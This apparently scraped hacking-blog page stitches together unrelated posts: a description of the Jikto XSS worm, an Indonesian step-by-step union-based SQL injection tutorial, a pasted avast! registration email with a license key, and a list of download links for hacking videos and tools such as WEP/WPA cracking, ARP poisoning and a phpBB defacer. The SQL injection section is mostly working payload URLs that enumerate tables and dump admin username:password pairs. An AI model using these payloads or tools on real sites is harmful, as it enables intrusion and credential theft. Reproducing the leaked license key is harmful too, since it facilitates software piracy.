Brute Forcer for WordPress, MySQL, WebAuth, GMaiL, Friendster and Cpanel
Jikto
Jikto works by exploiting a XSS flaw on a given Web site and then silently installing itself on a user’s PC. It can then operate in one of two modes. In one mode, Jikto crawls a specific Web site in much the same way that a Web application scanner would, looking for common vulnerabilities, such as XSS or SQL injection. It then reports the results to whatever machine is controlling it. In the other mode Jikto calls home to the controlling PC and tells it that it has installed itself on a new machine, and then awaits further instructions from the controller.
This is the Screenshot of it
Sql Injection Ver. 5
Untuk mencari ada atau tidak bugnya sebenernya ada di artikel sebelumnya, juga standar pencarian union, gue cuma nambahin sedikit aja, jadi gue copy paste aje ye 
1.) Cek Kutu
Misalkan kita mendapatkan target
http://www.target.com/news.php?id=5
Sekarang kita test ada kutunya g tuh website dengan menambahkan di url’
contoh http://www.target.com/news.php?id=5′
maka akan muncul error
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
Atau Yang mendekati
Itu berarti kita bisa gunakan Sql Injection
2). Mencari nomor dari kolom
Untuk mencari nomor dari kolom kita menggunakan perintah ORDER BY
Kita melakukan perurutan nomor sampai ada error
http://www.target.com/news.php?id=5+order+by+1/* <– no error
http://www.target.com/news.php?id=5+order+by+2/* <– no error
http://www.target.com/news.php?id=5+order+by+3/* <– no error
http://www.target.com/news.php?id=5+order+by+4/* <– error (kita akan mendapatkan pesan seperti Unknown column ‘4′ in ‘order clause’ atau sesuatu seperti itu…ya gitu degh 
)
Berarti kita mendapatkan kolomnya, ya itu 3, karena di 4 error.
Sedikit penjelasan, dalam penggunaan ORDER BY kita mencari pertemuan dimana website itu menjadi error dan tidak, setelah itu mendapatkannya, kita ambil yg tidak erorr terakhir sebelum keluar error.
3). Menggunakan fungsi UNION
Dengan menggunakan UNION kita dapat memilih lebih banyak data dalam satu statemen sql.
Jadi kita mendapatkan
http://www.target.com/news.php?id=5+UNION+SELECT+1,2,3/* (kita telah menemukan bahwa nomor dari kolom-kolom adalah 3 di dalam bagian 2)
Sekarang lihat pada artikel, artikelnya akan berubah jadi nomor 1 atau 2 atau 3 atau keluar semuanya, itu lah gunanya UNION
4). Check versi dari MySQL
http://www.target.com/news.php?id=5+union+select+1,2,3/*
NOTE: jika /* tidak bisa atau terjadi error, coba dengan –
ini merupakan suatu komentar penting bagi query kita untuk bekerja dengan baik.
Misalkan kita mendapatkan nomor 2 di dalam tampilan, sekarang kita cek verisinya
kita buang nomor 2, ganti dengan version() atau @@version nanti akan mendapatkan seperti 4.1.33-log atau 5.0.45 atau yang mendekati.
Contoh tampilan : http://www.target.com/news.php?id=5+union+select+1,@@version,3/*
Jika kamu mendapatkan error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
Yang kita butuhkan adalah fungsi convert()
contoh :
http://www.target.com/news.php?id=5+union+select+1,convert(@@version+using+latin1),3/*
atau dengan hex() dan unhex()
contoh :
http://www.target.com/news.php?id=5+union+all+select+1,unhex(hex(@@version)),3/*
dan kamu akan mendapatan versi MySql 
5). Mendapatkan table dan nama column
Jika versi MySQL adalah 5 (contoh : 5.0.45, 5.0.51a-community…)
– Mencari Table
Contoh Nomor yang keluar ada 2, jadi kita masukan perintah injekan di nomor 2
http://www.target.com/news.php?id=5+union+select+1,table_name,3+from+information_schema.tables+where+table_schema=database()+limit+0,1/*
Untuk melihat table selanjutnya kita rubah limit+0,1/* menjadi limit+1,1/* lalu limit+2,1/* dst.
Sampai tabel yang dinginkan, contoh table admin
– Mencari Column
Sekarang kita cari column pada table admin
http://www.target.com/news.php?id=5+union+select+1,column_name,3+from+information_schema.columns+where+table_name=’admin’+limit+0,1/*
Setandarnya bisa menggunakan itu jika quotenya off, tetapi jika quote on nama table harus di encode dengan hexa
admin = 61646D696E
Untuk dapat di baca oleh perintah SQL, harus di tambahakan 0x sihingga menjadi 0×61646D696E
http://www.target.com/news.php?id=5+union+select+1,column_name,3+from+information_schema.columns+where+table_name=0×61646D696E+limit+0,1/*
Untuk melihat colum selanjutnya tinggal merubah limitnya seperti table diatas.
Contoh column yang keluar username dan password
Sekarang kita lihat datanya
http://www.target.com/news.php?id=5+union+select+1,username,3+from+admin/*
Contoh data yang keluar : admin
http://www.target.com/news.php?id=5+union+select+1,password,3+from+admin/*
Contoh data yang keluar : p45w0rd
sekarang kita harus menyelesaikan query biar terlihat bagus 
untuk itu kita menggunakan fungsi concat() (merupakan penggabungan strings)
contoh :
http://www.target.com/news.php?id=5+union+all+select+1,concat(username,0×3a,password),3+from+admin/*
catatan : 0×3a, adalah nilai hex dari 3a, sedangkan 0x merupakan tambahan untuk dapat di baca oleh URL
(ada cara lain untuk itu dengan menggunakan, char(58), merupakan dari nilai decimal )
http://www.target.com/news.php?id=5+union+all+select+1,concat(username,char(58),password),3+from+admin/*
Maka akan muncul tampilan data : admin:p45w0rd
avast! Registration
Dear user,
Your registration of avast! 4 Home Edition was successful. You must now insert your license key into the program.
Your license key is:
———- cut here ———-
W78606817H5500A1106-VMHFB2S1
———- cut here ———-
Next steps:
1. Check that you have installed avast! antivirus on your computer! To download avast antivirus now, go to http://www.avast.com/eng/programs.html
2. Highlight the license key above, then right click on it and select “Copy”
3. right click the blue “a-ball” in the bottom right corner of the screen, then left click “About avast!”
4. Left click “License key”
5. Right click in the empty License Key box then select “Paste”
6. Click “OK”. Your license key is now inserted and the program can now be used free of charge for a further 12 months.
For a video demonstration of how to insert the license key, please click on the following link:
http://www.avast.com/files/tutorials/insert_key.htm
Please note that under the license conditions avast! 4 Home Edition is for home, personal and non-commercial use only. Commercial versions of avast! can be found at http://www.avast.com/eng/desktop_solutions.html
If you experience any difficulties inserting the license key, please click here:
http://www.avast.com/eng/faq-registration-license.html
Thank you for choosing avast! antivirus software.
The ALWIL Software team
Hacking Video’s for Newbie
ARP Spoofing (with written tutorial) – This video shows how to perform an ARP Spoofing attack.
http://kisp.org/elohimus/tutorials/ARPSpoofing.rar
Example Of A Wireless Hack – This video shows a real life wireless hack.
http://kisp.org/elohimus/tutorials/lequipe.avi
Netbios Hacking – This video shows how to exploit file sharing.
http://kisp.org/elohimus/tutorials/netbios.avi
Tracing an E-mail and finding out more about the host that sent it
| Code: |
| http://www.irongeek.com/i.php?page=videos/emailip |
How to sniff around switches using Arpspoof and Ngrep
| Code: |
| http://www.irongeek.com/i.php?page=videos/sniffingaroundaswitch |
Start a session and get interactive commandline access to a remote Windows box
| Code: |
| http://www.irongeek.com/i.php?page=videos/interactiveCMD |
Install VNC Remotely
| Code: |
| http://www.irongeek.com/i.php?page=videos/installvnc |
Cain to ARP poison and sniff passwords
| Code: |
| http://www.irongeek.com/i.php?page=videos/cain1 |
Cracking Syskey and the SAM on Windows Using Samdump2 and John
| Code: |
| http://www.irongeek.com/i.php?page=videos/samdump2auditor |
WEP Cracking using Aireplay v2.2 Beta 7 5.2 Megs /SWF
| Code: |
| http://crimemachine.com/Tuts/Flash/whax-aircrack-wep.html |
Cracking WPA Networks. 14.81 Megs /SWF
| Code: |
| http://crimemachine.com/Tuts/Flash/WPA.html |
Mass De-Authentication using void11. 16.5 Megs /SWF
| Code: |
| http://crimemachine.com/Tuts/Flash/void11.html |
How to decrypt SSL encrypted traffic using a man in the middle attack. 32 Megs /SWF
| Code: |
| http://crimemachine.com/Tuts/Flash/SSLMITM.html |
Cracking a 128 bit WEP key. 51 Megs /SWF
| Code: |
| http://crimemachine.com/Tuts/Flash/wepcracking.html |
Exploiting weaknesses of PPTP VPN. 5.52 Megs /SWF
| Code: |
| http://crimemachine.com/Tuts/Flash/pptp-vpn.html |
Hack A Board :
| Code: |
| www.frostfreaks.com/Hack%20a%20Board.rar |
Buffer Overflows -
| Code: |
| http://rapidshare.de/files/7937133/BO_VIDS.rar.html |
The Broken hacking Videos:
enter thebroken
| Code: |
| http://videos.revision3.com/thebroken/thebroken1.avi |
hacking with ramzi
| Code: |
| http://videos.revision3.com/thebroken/thebroken2.avi |
return of thebroken
| Code: |
| http://videos.revision3.com/thebroken/thebroken3.avi |
phpBB defacer + video video tutorial
Download Program
| Code: |
| http://rapidshare.de/files/4371905/Phpbb_defacer.zip.html |
download video:
| Code: |
| http://www.ashiyane.net/files/PhpBBDefacerVideo.rar |
Another One (Hack a phpBB forum TEXT/VIDEO TUTORIAL)
| Code: |
| TEXT: http://rapidshare.de/files/4169234/How_to_hack_phpBB_2.0.10_and_lower_by_noxx.txt.html |
| Code: |
| VID (AVI): 16.6MB (TIME:around 5 mins.) http://rapidshare.de/files/4169320/noxx_phpBB_hacking.avi.html |
Hack.lu 2005 conference part 1 – Luxembourg
| Code: |
| http://vp.video.google.com/videoplayback?id=d4faf8d6ab79afe7&begin=0 &len=2803000&itag=5&urlcreated=1135323490&docid=-7721747421697269614&url created=1135323490&sigh=RVMVn73ZIQ73AGoNgH3WVjnrUyc&autoPlay=true |
Conference hack.lu 2005 – Luxembourg – part 2
| Code: |
| http://vp.video.google.com/videoplayback?id=42a555e860c764a3&begin=0& len=4018520&itag=5&urlcreated=1135323575&docid=3473458963222216897&url created=1135323575&sigh=3fFMhZ8t51P7rTwt1ZKcL8JQm3U&autoPlay=true |
Video on how to produce collisions for read-world hash functions such as SHA-0, SHA-1, and the SHA-2 family
| Code: |
| http://vp.video.google.com/videoplayback?id=60453fc1275f638&begin=0& len=2497880&itag=5&urlcreated=1135323685&docid=-3942282589821274604&url created=1135323685&sigh=xfogedI10uUeLJSjunHg4BnmnP4&autoPlay=true |
Internet Explorer Man in the Middle Attack
| Code: |
| http://vp.video.google.com/videoplayback?id=5d50faa1c2c1113a&begin=0&l en=257023&itag=5&urlcreated=1135324064&docid=6010737636147331215&url created=1135324064&sigh=kzy561qaQ98N9Cy1Bi9-JFQszuI&autoPlay=true |
Note: You should add the file extension .flv to the end after downloading. You will also require a FLV player to play this file.
Download flv player here:
| Code: |
| http://www.download.com/FLV-Player/3000-2139_4-10467082.html |
